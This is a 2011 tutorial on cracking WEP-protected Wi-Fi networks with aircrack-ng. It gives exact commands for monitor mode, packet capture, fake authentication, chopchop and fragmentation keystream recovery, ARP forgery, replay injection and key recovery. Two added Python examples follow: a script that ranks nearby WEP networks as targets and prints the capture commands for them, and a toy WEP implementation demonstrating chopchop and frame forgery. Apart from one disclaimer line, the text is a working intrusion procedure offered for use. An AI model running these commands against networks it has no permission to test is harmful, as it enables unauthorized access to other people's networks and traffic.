Hacking wireless networks with WEP encryption using aircrack-ng
Technical Stuff - Networking
Written by Dadas
Thursday, 13 October 2011 17:09
aircrack-ng is a tool that can recover a WEP key once enough encrypted data packets (packets with unique IVs) have been captured. To recover a 64-bit key (a 40-bit secret, 5 characters) you need roughly 15 000 packets, and to recover a 128-bit key (a 104-bit secret, 13 characters) roughly 80 000. The exact count varies from network to network; if aircrack-ng fails, keep capturing and try again.
First of all, this tutorial is NOT for Windows: stock Windows drivers won't put the card into monitor mode to capture other stations' packets, and they won't inject packets with custom content. If you are on Windows, get the Backtrack 5 Linux live DVD (aircrack-ng and many wlan drivers come preinstalled); if you already run Linux, get aircrack-ng from here and install it. Also, attacking wireless networks you do not own or have permission to test is illegal, so use this only against your home network!
If you need that Backtrack live DVD, get it from here:
Now, when you have Linux up and running, follow these steps to hack any network with WEP encryption:
1. Set your wlan adapter into monitor mode
Monitor mode is required if you want to capture wifi traffic.
To do this you can use the tool called airmon-ng.
Running "airmon-ng" on its own lists the available wlan adapters:
My wlan adapter is called "wlan0".
Now, to put it into monitor mode, run "airmon-ng start wlan0"
It should say that monitor mode was enabled on mon0. If airmon-ng lists processes that could cause trouble (NetworkManager, wpa_supplicant, dhclient), stop them first, or they will keep switching channels under you and break both the capture and the injection. Newer aircrack-ng releases name the monitor interface wlan0mon instead of mon0; if yours does, use that name in every command below.
Now you can use mon0 to capture wifi packets with airodump-ng.
2. Find BSSID and channel of your target network
Run "airodump-ng mon0" to start capturing packets; it should output something like this:
Telecom (my network) is running on channel 6 (you can see it under "CH") and has BSSID 00:50:7F:BE:CE:60
The number of data packets captured from each network is shown under "#Data". Those are the encrypted packets carrying IVs that aircrack-ng needs; beacons don't count.
When someone is connected and downloading something, it increases pretty fast :)
Now you have to point airodump-ng at your target network only:
airodump-ng --bssid BSSID --channel CHANNEL -w cap mon0
--bssid selects your target network, --channel locks the card to its channel (without it airodump-ng keeps hopping channels and misses most of the traffic) and -w sets the prefix of the output files.
It creates four files with that prefix; we need only one, "cap-01.cap".
If cap-01.cap already exists in the current folder, the new file is called "cap-02.cap" and so on.
Don't forget -w: it is annoying to capture 100 000 packets and then find out that no output file was ever written.
3. Run aircrack-ng against the file with the captured packets
My file was called cap-01.cap, so my command was:
This is what a successful attack looks like:
I had around 81 000 captured packets, enough for a 128-bit key. You don't have to wait for that many before trying: aircrack-ng can run while airodump-ng is still capturing, and if it fails for lack of IVs it keeps re-reading the capture file and retries as more packets arrive.
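Added example (not code from the original post or from the aircrack-ng project): a small Python parser for the cap-01.csv file that airodump-ng writes next to the .cap when you pass -w. It reads the AP table and the station table, keeps only the WEP networks, notes which ones have an associated client (the networks worth waiting on, as step 3 says) and whether the "# IV" column, which is the #Data counter on screen, has reached the packet counts quoted at the top of this page. The CSV text is constructed in the layout airodump-ng 1.x uses and is not a real capture; apart from the author's Telecom line, every MAC, ESSID and count in it is made up.

```python
# Added example: parse airodump-ng's cap-01.csv and pick WEP targets.

# Rough data-packet (IV) counts this tutorial quotes for a successful crack.
IVS_NEEDED = {64: 15_000, 128: 80_000}

# Constructed sample in the layout airodump-ng 1.x writes with -w; not a real capture.
# Only the first AP line mirrors the author's network (Telecom, channel 6).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:50:7F:BE:CE:60, 2011-10-13 17:00:12, 2011-10-13 17:09:40,  6,  54, WEP , WEP, OPN, -38,      512,    81230,   0.  0.  0.  0,   7, Telecom,
00:1A:2B:3C:4D:5E, 2011-10-13 17:00:15, 2011-10-13 17:09:38, 11,  54, WEP , WEP, OPN, -71,      488,     3120,   0.  0.  0.  0,   5, guest,
00:0C:42:11:22:33, 2011-10-13 17:00:20, 2011-10-13 17:09:39,  1,  54, WPA2, CCMP, PSK, -60,      501,        0,   0.  0.  0.  0,   8, HomeWiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1C:B3:09:85:15, 2011-10-13 17:01:02, 2011-10-13 17:09:41, -50,     9421, 00:50:7F:BE:CE:60, Telecom
00:21:6A:AA:BB:CC, 2011-10-13 17:02:10, 2011-10-13 17:09:30, -80,       12, (not associated), HomeWiFi
"""


def parse_airodump_csv(text: str):
    """Return ({bssid: ap-dict}, [station-dict]) from airodump-ng CSV text.
    The file holds two comma-separated tables split by a blank line. Fields are
    space-padded and ESSIDs are not quoted, so an ESSID containing a comma would
    shift the columns (the ID-length column could be used to repair that)."""
    aps, stations, section = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "station"
            continue
        f = [x.strip() for x in line.split(",")]
        if section == "ap" and len(f) >= 14:
            aps[f[0]] = {"bssid": f[0], "channel": int(f[3]), "privacy": f[5],
                         "ivs": int(f[10]), "essid": f[13]}
        elif section == "station" and len(f) >= 6:
            stations.append({"mac": f[0], "bssid": f[5]})
    return aps, stations


def wep_targets(aps, stations, key_bits: int = 128):
    """WEP networks only, most IVs first, each with its associated clients and
    whether the '# IV' count (the #Data column on screen) reached the threshold."""
    need = IVS_NEEDED[key_bits]
    clients = {}
    for s in stations:
        clients.setdefault(s["bssid"], []).append(s["mac"])
    out = [dict(ap, clients=clients.get(ap["bssid"], []), enough_ivs=ap["ivs"] >= need)
           for ap in aps.values() if ap["privacy"].startswith("WEP")]
    return sorted(out, key=lambda ap: -ap["ivs"])


def airodump_command(target: dict, prefix: str = "cap", iface: str = "mon0") -> str:
    """The step-2 command line that locks airodump-ng onto one network."""
    return f"airodump-ng --bssid {target['bssid']} --channel {target['channel']} -w {prefix} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for t in wep_targets(aps, stations):
        status = "ready to crack" if t["enough_ivs"] else "keep capturing / inject"
        print(f"{t['essid']:10} ch{t['channel']:<2} IVs={t['ivs']:<6} clients={len(t['clients'])} -> {status}")
        print("   ", airodump_command(t))
```

Run it against your own cap-01.csv by reading the file into a string instead of SAMPLE_CSV; a WEP network with a client and a rising IV count is the one to stay on, and a WEP network with no client is the case where the injection in steps 4 to 6 is needed.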
This was a very basic attack on a wireless network; it works well when someone is connected to the network and downloading large files. When nobody is connected, or the owner is not downloading anything big, you can use "packet injection" to speed things up.
The idea: obtain a keystream for one IV, use it to build a valid encrypted ARP request, then send that request to the network over and over. The AP re-encrypts and relays every copy with a fresh IV of its own, and those relayed packets are exactly what aircrack-ng needs.
4. Obtain a keystream
There are two attacks that recover a keystream from the network, and a keystream is what you need to generate a valid ARP packet. Neither attack works unless the AP regards you as associated, because it silently drops data frames from unknown stations. To get associated, use aireplay-ng to send fake authentication requests:
aireplay-ng -1 6000 -q 10 -o 1 -a BSSID mon0
-1 6000 means re-authenticate every 6000 seconds, -q 10 sends a keep-alive packet every 10 seconds, -o 1 sends only one set of packets at a time (some APs get confused by more), -a is the BSSID and mon0 is your adapter in monitor mode. By default aireplay-ng uses your card's own MAC address (you can give it another one with -h); note which one it is, because the ARP packet you forge in step 5 must carry the same source MAC or the AP will drop it.
This only works if the network uses open authentication. With shared-key authentication the fake auth itself needs a keystream (aireplay-ng's -y option), which this tutorial does not cover.
Now you can use the chopchop or fragmentation attack to obtain a keystream.
4a. Use the chopchop attack to get a keystream:
aireplay-ng --chopchop -a BSSID mon0
It now waits for a single data packet. This takes a little longer if nobody is connected, but most networks send some packet sooner or later even with no client present (at least my network does, I don't know why).
When a packet has been captured it asks "Use this packet?"; answer "y" :D
Now it guesses the keystream one byte at a time, starting from the end of the packet: it chops off the last byte, guesses it, patches the CRC-32 integrity check to match (the CRC is linear, so the patch depends only on the guess) and resends the shortened packet; the AP relays it only when the guess was right, and each right guess reveals one more keystream byte. The aircrack-ng documentation runs chopchop with -b BSSID -h YOUR_MAC so the packets carry the MAC you authenticated with; add -h if the AP ignores the shortened packets. If you want to learn more about chopchop, see this link.
When it has finished, you will see that it saved the keystream to a file with a .xor extension:
my keystream is called replay_dec-0829-132410.xor
Now I can use it to generate a packet with packetforge-ng (step 5).
4b. Use the fragmentation attack to obtain a keystream:
aireplay-ng --fragment -b BSSID mon0
Here is what a successful fragmentation attack looks like:
It also asks "Use this packet?" once a packet has been captured, but you need a good signal: with a weak one you will see "Not enough acks" messages, and then all you can do is try the chopchop attack instead :D
If you want to find out more about the fragmentation attack, read this PDF file:
5. Use packetforge-ng to generate an ARP packet
packetforge-ng -0 -a ACCESS_POINT'S_MAC -h YOUR_MAC -k 255.255.255.0 -l 255.255.255.0 -y keystream.xor -w arp
-0 means build an ARP packet, -a is the AP's MAC, -h is your MAC (the same one you used for fake authentication), -k is the destination IP, -l is the source IP, -y is the file with the keystream and -w is the output file. The keystream must be at least as long as the ARP packet plus its 4-byte ICV, which is one reason the packet you chop or fragment has to be a data packet of reasonable size.
If everything worked, it should print this message:
"wrote packet to arp"
Now you can use aireplay-ng to send this packet to your target network over and over and generate the traffic you need.
6. Send your ARP packet to the target network
aireplay-ng -2 -r arp mon0
-2 means "interactive packet replay", -r arp reads the packet from the file "arp", and mon0 is your wlan adapter in monitor mode. It shows the packet and asks "Use this packet?"; answer "y".
Now check the terminal where airodump-ng is running: #Data should climb rapidly :)
Once you have enough packets, use aircrack-ng to recover the key (step 3).
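Added example (not code from the original post or from aircrack-ng): a toy WEP implementation in Python that shows what steps 4 to 6 do to the bits. The chopchop loop recovers the keystream for one IV using nothing but an accept/reject oracle, which is the property the real attack gets from the AP relaying or dropping the shortened frames; the packetforge-style function then builds an ARP request and encrypts it under that keystream, reusing the IV, and the oracle accepts the forged frame even though the attacker code never saw the key. The key, MACs, IPs and IV are made-up demo values. One simplification: the toy oracle also accepts the final four-byte frame (an empty message with its all-zero ICV), which a real AP may not relay, so the loop here runs all the way to the start of the packet.

```python
import struct
import zlib

# Added example: toy WEP, the chopchop keystream recovery and a packetforge-style
# ARP builder. All key/MAC/IP/IV values below are constructed demo data.


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as sent on the air: IV(3) | key-id byte | RC4(IV||key, plaintext||ICV)."""
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(key: bytes, body: bytes):
    """What the AP does with a received body: decrypt, accept only if the ICV matches."""
    iv, data = body[:3], body[4:]
    pt_icv = xor(data, rc4(iv + key, len(data)))
    pt = pt_icv[:-4]
    return pt if icv(pt) == pt_icv[-4:] else None


# Reflected CRC-32 table (the one zlib uses); chopchop's patch comes from its entries.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)


def chopchop(body: bytes, accepts):
    """Recover the keystream for body's IV without the key, one byte per round from
    the end. CRC-32 is linear, so after chopping the last byte there are only 256
    possible 4-byte patches that make the shorter frame a valid WEP frame again, one
    per guess g; `accepts` (the AP relaying or dropping the frame) reveals the right
    one, and that g also fixes the chopped plaintext byte, hence a keystream byte."""
    head, cipher = body[:4], body[4:]
    keystream = bytearray()
    while len(cipher) > 4:
        for g in range(256):
            t = CRC_TABLE[g]
            mask = bytes([g ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])
            cand = cipher[:-5] + xor(cipher[-5:-1], mask)
            if accepts(head + cand):
                keystream.insert(0, cipher[-1] ^ (t >> 24) ^ 0xFF)
                cipher = cand
                break
        else:
            raise RuntimeError("no guess accepted; oracle is not behaving like a WEP AP")
    # Four bytes left: plaintext is the empty message plus its all-zero ICV, i.e. pure keystream.
    return body[:3], bytes(cipher) + bytes(keystream)


LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + 28-byte ARP request, the packet packetforge-ng -0 builds
    (-h sender MAC, -l source IP, -k destination IP)."""
    return (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + bytes(6) + target_ip)


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """What packetforge-ng -y does: encrypt a new packet under the recovered keystream,
    reusing its IV (WEP lets any station reuse an IV, so the AP accepts it)."""
    if len(plaintext) + 4 > len(keystream):
        raise ValueError("recovered keystream is shorter than packet plus ICV")
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), keystream)


VICTIM_KEY = bytes.fromhex("0a1b2c3d4e5f60718293a4b5c6")  # hypothetical 13-byte (104-bit) secret
CLIENT_MAC = bytes.fromhex("001cb3098515")               # hypothetical legitimate client
ATTACKER_MAC = bytes.fromhex("001122334455")             # the MAC used for aireplay-ng -1 fake auth


def run_demo() -> dict:
    """One captured ARP -> chopchop -> forged ARP that the key-holding AP accepts."""
    iv = b"\x11\x22\x33"
    seen = wep_encrypt(VICTIM_KEY, iv, arp_request(CLIENT_MAC, bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1])))
    ap_accepts = lambda frame: wep_decrypt(VICTIM_KEY, frame) is not None  # only the AP holds the key
    iv, ks = chopchop(seen, ap_accepts)                  # the .xor file aireplay-ng writes
    mine = arp_request(ATTACKER_MAC, bytes([192, 168, 1, 200]), bytes([192, 168, 1, 1]))
    forged = forge_frame(iv, ks, mine)                   # the "arp" file from packetforge-ng
    return {"keystream": ks, "forged": forged, "wanted": mine,
            "ap_decrypts_to": wep_decrypt(VICTIM_KEY, forged)}


if __name__ == "__main__":
    r = run_demo()
    print("keystream:", r["keystream"].hex(), "AP accepted forged ARP:", r["ap_decrypts_to"] == r["wanted"])
```

Replaying `forged` is step 6: every copy the AP relays is re-encrypted under a new IV, which is why #Data climbs even though the same bytes are injected each time.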
Last Updated on Thursday, 24 November 2011 22:44